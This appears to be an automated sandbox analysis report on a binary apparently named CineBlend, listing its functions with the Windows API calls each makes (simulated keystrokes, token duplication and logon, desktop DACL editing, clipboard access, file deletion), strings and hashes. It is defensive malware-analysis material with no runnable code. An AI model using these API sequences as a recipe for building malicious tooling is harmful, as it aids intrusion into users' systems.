Instruction ID: 87ba0e55b70b5396831cdbc946c1bc0251a92d4704994311a3ddf693a16681a2
Opcode Fuzzy Hash: e3cd986f04f02ec1eef6fc92a8574aea766554681eb11e3335c1dc59b7776aec
Instruction Fuzzy Hash: CFD05EB1422314BF9B2C8B55CD5ACB776DCEA01651380156EB402E2940F5E0FD00CAA0

Function 00B8071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00B80A84,?,?,00000000,?,00B80A84,00000000,0000000C), ref: 00B80737

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 07a4a9814090e838b7491c17a14f1f9e60a8c3532fbf4fa0cdd894543fb23d07
Instruction ID: 6fa01bf73b62e946df31bab49563ecf6a86353104f7fbba49b9daec5464eb004
Opcode Fuzzy Hash: 07a4a9814090e838b7491c17a14f1f9e60a8c3532fbf4fa0cdd894543fb23d07
Instruction Fuzzy Hash: 83D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014000BE5866020C732E821AB90

Non-executed Functions

Function 00B5FC7C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00B5FC86
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B9FCB8
IsIconic.USER32(00000000), ref: 00B9FCC1
ShowWindow.USER32(00000000,00000009), ref: 00B9FCCE
SetForegroundWindow.USER32(00000000), ref: 00B9FCD8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B9FCEE
GetCurrentThreadId.KERNEL32 ref: 00B9FCF5
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B9FD01
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B9FD12
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B9FD1A
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B9FD22
SetForegroundWindow.USER32(00000000), ref: 00B9FD25
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9FD3A
keybd_event.USER32(00000012,00000000), ref: 00B9FD45
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9FD4F
keybd_event.USER32(00000012,00000000), ref: 00B9FD54
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9FD5D
keybd_event.USER32(00000012,00000000), ref: 00B9FD62
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9FD6C
keybd_event.USER32(00000012,00000000), ref: 00B9FD71
SetForegroundWindow.USER32(00000000), ref: 00B9FD74
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B9FD9B

Strings

Shell_TrayWnd, xrefs: 00B9FCB3

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 62c9573bf9f8b4b41f6536cce2cfc08df1448b21880288f66ab0c88eb88274f9
Instruction ID: 173a17bdd1087a37a5aae008c667dbc7484485a6d834a293c1a8caaf86c96738
Opcode Fuzzy Hash: 62c9573bf9f8b4b41f6536cce2cfc08df1448b21880288f66ab0c88eb88274f9
Instruction Fuzzy Hash: 24315571A812197AEF216BB55C49F7E7F6CEB44B54F1100B6FA01E71D1DAB05D009AA0

Function 00BA1B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00BA2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA205A
Part of subcall function 00BA2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA2087
Part of subcall function 00BA2010: GetLastError.KERNEL32 ref: 00BA2097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00BA1BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00BA1BF4
CloseHandle.KERNEL32(?), ref: 00BA1C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BA1C1D
GetProcessWindowStation.USER32 ref: 00BA1C36
SetProcessWindowStation.USER32(00000000), ref: 00BA1C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BA1C5C

Part of subcall function 00BA1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA1B48), ref: 00BA1A20
Part of subcall function 00BA1A0B: CloseHandle.KERNEL32(?,?,00BA1B48), ref: 00BA1A35

Strings

winsta0, xrefs: 00BA1C18
, xrefs: 00BA1BA6
default, xrefs: 00BA1C57

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 74735624195e0652eaa7d31952161b0e88f41de666c74f8f8aa7a965abbf55c5
Instruction ID: 83e6bf82cb727cce5f8012bcfbc3901f5afc87302e60749d81746945729c37cc
Opcode Fuzzy Hash: 74735624195e0652eaa7d31952161b0e88f41de666c74f8f8aa7a965abbf55c5
Instruction Fuzzy Hash: 5F81AD71905209AFDF119FA8CD49FEEBBF8EF09300F1448AAF954A71A0DB318945CB60

Function 00BA14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA1A60
Part of subcall function 00BA1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A6C
Part of subcall function 00BA1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A7B
Part of subcall function 00BA1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A82
Part of subcall function 00BA1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BA1518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BA154C
GetLengthSid.ADVAPI32(?), ref: 00BA1563
GetAce.ADVAPI32(?,00000000,?), ref: 00BA159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BA15B9
GetLengthSid.ADVAPI32(?), ref: 00BA15D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00BA15D8
HeapAlloc.KERNEL32(00000000), ref: 00BA15DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BA1600
CopySid.ADVAPI32(00000000), ref: 00BA1607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA1636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BA1658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA1691
HeapFree.KERNEL32(00000000), ref: 00BA1698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA16A1
HeapFree.KERNEL32(00000000), ref: 00BA16A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA16B1
HeapFree.KERNEL32(00000000), ref: 00BA16B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00BA16C4
HeapFree.KERNEL32(00000000), ref: 00BA16CB

Part of subcall function 00BA1ADF: GetProcessHeap.KERNEL32(00000008,00BA14FD,?,00000000,?,00BA14FD,?), ref: 00BA1AED
Part of subcall function 00BA1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00BA14FD,?), ref: 00BA1AF4
Part of subcall function 00BA1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00BA14FD,?), ref: 00BA1B03

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 32f54c27e673ef769e35b66c41a014ecbb0bea2db8bf463ce3041945ca7fe520
Instruction ID: 7f5cafd5f5bce1d02b13d02ca16f611c6de8dbca8d8bd3d2d9bdf9f54c2b41df
Opcode Fuzzy Hash: 32f54c27e673ef769e35b66c41a014ecbb0bea2db8bf463ce3041945ca7fe520
Instruction Fuzzy Hash: A4717CB2905209BBDF50DFA9DC44FAEBBB8FF45340F084956E955E7190EB309905CBA0

Function 00BBF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00BDDCD0), ref: 00BBF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00BBF594
GetClipboardData.USER32(0000000D), ref: 00BBF5A0
CloseClipboard.USER32 ref: 00BBF5AC
GlobalLock.KERNEL32(00000000), ref: 00BBF5E4
CloseClipboard.USER32 ref: 00BBF5EE
GlobalUnlock.KERNEL32(00000000), ref: 00BBF619
IsClipboardFormatAvailable.USER32(00000001), ref: 00BBF626
GetClipboardData.USER32(00000001), ref: 00BBF62E
GlobalLock.KERNEL32(00000000), ref: 00BBF63F
GlobalUnlock.KERNEL32(00000000), ref: 00BBF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00BBF695
GetClipboardData.USER32(0000000F), ref: 00BBF6A1
GlobalLock.KERNEL32(00000000), ref: 00BBF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00BBF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00BBF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00BBF72F
GlobalUnlock.KERNEL32(00000000), ref: 00BBF750
CountClipboardFormats.USER32 ref: 00BBF771
CloseClipboard.USER32 ref: 00BBF7B6

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 26ef32a0e7ee073f4da10b2901bcb69bf09de700ecaad6d0a265fe110ba516f5
Instruction ID: e04c1155998ba4547efc3c88785edf3687cafdb839f5b1429db708c093dcbb61
Opcode Fuzzy Hash: 26ef32a0e7ee073f4da10b2901bcb69bf09de700ecaad6d0a265fe110ba516f5
Instruction Fuzzy Hash: 46617D352042029FD310EF24DC95EBAB7E4EF84744F1445A9F88A872A2DF71DD45DBA2

Function 00BB73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00BB7403
FindClose.KERNEL32(00000000), ref: 00BB7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BB7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BB74BA

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00BB74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BB7524

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00BB75AF
%4d, xrefs: 00BB75F6
%02d, xrefs: 00BB7645, 00BB764F, 00BB769F, 00BB76EF, 00BB773F, 00BB778F
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00BB7577
%03d, xrefs: 00BB77E7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 9138f828032d0ef37af3dbb698f34ac22da3213f12b7d7423233fe521e7f16e3
Instruction ID: 2519e15838f0879dafb6f292455d029642c3a2dd9946ddcf61dd34888f7b1341
Opcode Fuzzy Hash: 9138f828032d0ef37af3dbb698f34ac22da3213f12b7d7423233fe521e7f16e3
Instruction Fuzzy Hash: 59D15F72508304AFC310EB64C881EBFB7ECEF98704F4409A9F58596291EB74DA44DB62

Function 00BBA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00BBA0A8
GetFileAttributesW.KERNEL32(?), ref: 00BBA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00BBA100
FindNextFileW.KERNEL32(00000000,?), ref: 00BBA118
FindClose.KERNEL32(00000000), ref: 00BBA123
FindFirstFileW.KERNEL32(*.*,?), ref: 00BBA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00BBA18F
SetCurrentDirectoryW.KERNEL32(00C07B94), ref: 00BBA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBA1B7
FindClose.KERNEL32(00000000), ref: 00BBA1C4
FindClose.KERNEL32(00000000), ref: 00BBA1D4

Strings

*.*, xrefs: 00BBA13A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 26bb5a3e60436b0c0fe53f5602cd7cc72ed1793e69ff589a7d6252b1e81af850
Instruction ID: 51c575682435092508b9008d73e559fefb3972d92e440d1879af018f28e9b7ed
Opcode Fuzzy Hash: 26bb5a3e60436b0c0fe53f5602cd7cc72ed1793e69ff589a7d6252b1e81af850
Instruction Fuzzy Hash: 2031F7319012196BDB24AFB9DC49AEEB7ECDF05320F1005E6E855E3090FBB4DE45CA65

Function 00BB4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BB4785
_wcslen.LIBCMT ref: 00BB47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00BB47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BB4803
RemoveDirectoryW.KERNEL32(?), ref: 00BB4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BB489A
CloseHandle.KERNEL32(00000000), ref: 00BB48A5
CloseHandle.KERNEL32(00000000), ref: 00BB48B0

Strings

:, xrefs: 00BB47C7
\, xrefs: 00BB47BC
\??\%s, xrefs: 00BB47A0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: ba3eb777fa755de5eb0b73496ed8383ee52cd6a52b792fde7638fbaa88cbb782
Instruction ID: 0751f19fc2b36e448a538fad79ff3a9abc7225520401745ec8b0fd2619621e7b
Opcode Fuzzy Hash: ba3eb777fa755de5eb0b73496ed8383ee52cd6a52b792fde7638fbaa88cbb782
Instruction Fuzzy Hash: BD319CB190024AABDB219BA0DC49FEB77FCFF89710F1041B6F609D2061EBB49644CB24

Function 00BBA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00BBA203
FindNextFileW.KERNEL32(00000000,?), ref: 00BBA25E
FindClose.KERNEL32(00000000), ref: 00BBA269
FindFirstFileW.KERNEL32(*.*,?), ref: 00BBA285
SetCurrentDirectoryW.KERNEL32(?), ref: 00BBA2D5
SetCurrentDirectoryW.KERNEL32(00C07B94), ref: 00BBA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBA2FD
FindClose.KERNEL32(00000000), ref: 00BBA30A
FindClose.KERNEL32(00000000), ref: 00BBA31A

Part of subcall function 00BAE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BAE3B4

Strings

*.*, xrefs: 00BBA280

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 8025b4471fbc13f2c06c6d9ca1eca7fd102c47f00194887891cd8485aac12689
Instruction ID: 0edb398a57410ca8977969c4555f5b9bbc7f03f8ab205b00108294b8022b40a7
Opcode Fuzzy Hash: 8025b4471fbc13f2c06c6d9ca1eca7fd102c47f00194887891cd8485aac12689
Instruction Fuzzy Hash: D33124319012096FCF20AFB4DC59AEEB7ECDF45320F1001E2E850A31A0EBB1DE85CA25

Function 00BCC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD451
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4C8
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCC99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00BCCA09
RegCloseKey.ADVAPI32(00000000), ref: 00BCCA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BCCA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BCCB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BCCBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BCCC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00BCCC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BCCD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BCCDE2
RegCloseKey.ADVAPI32(00000000), ref: 00BCCDEF

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 4ab45926d49dda6ab2da417ecd19448aa80d3ce5dd5bb1065749aef4f55d935e
Instruction ID: 6b772c91fea299b08a2e67a008f5403a41d31dc01b77686bb46f0ab15f405fe5
Opcode Fuzzy Hash: 4ab45926d49dda6ab2da417ecd19448aa80d3ce5dd5bb1065749aef4f55d935e
Instruction Fuzzy Hash: 710220716042009FD715DF24C895F2ABBE5EF99314F1884ADF84ACB2A2DB31ED46CB91

Function 00BAD921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B455D1,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B45871

Part of subcall function 00BAEAB0: GetFileAttributesW.KERNEL32(?,00BAD840), ref: 00BAEAB1

FindFirstFileW.KERNEL32(?,?), ref: 00BAD9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00BADA88
MoveFileW.KERNEL32(?,?), ref: 00BADA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00BADAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00BADAE2

Part of subcall function 00BADB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00BADAC7,?,?), ref: 00BADB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00BADAFE
FindClose.KERNEL32(00000000), ref: 00BADB0F

Strings

\*.*, xrefs: 00BAD978, 00BAD981, 00BAD996

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 48c48f792c6ba514e3cac1d371aac16b48c03bac2306a912fac9bbf974a52d96
Instruction ID: 25aa2aa8124a1943bf1dbbc968bd14731d6d408a79a1fcfe6c94eb9bf59c697a
Opcode Fuzzy Hash: 48c48f792c6ba514e3cac1d371aac16b48c03bac2306a912fac9bbf974a52d96
Instruction Fuzzy Hash: 0361283180910DAECF05EBA0D992EEDB7F5AF15300F6041E9E546771A2EB31AF09DB61

Function 00BBF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00BBF7EE
EmptyClipboard.USER32 ref: 00BBF7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00BBF809
CloseClipboard.USER32 ref: 00BBF900

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6b0aeda3c770c7e95324a72b8ff7e5dcaef60b1a732179c920b99c1cc3af05db
Instruction ID: 93f2521b6c06be38c4ce573df24e7c8cea07b2f81e77037c5376af76eedd3b8f
Opcode Fuzzy Hash: 6b0aeda3c770c7e95324a72b8ff7e5dcaef60b1a732179c920b99c1cc3af05db
